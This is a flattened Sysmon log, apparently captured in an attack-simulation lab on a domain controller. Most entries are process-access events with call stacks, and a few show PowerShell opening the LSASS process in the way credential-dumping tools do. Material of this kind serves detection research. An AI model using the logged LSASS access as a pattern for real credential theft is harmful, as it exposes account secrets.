13:34:15.345{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.299{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_ipijen5p.w4p.ps12021-01-18 13:34:15.299 10341000x80000000000000001314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 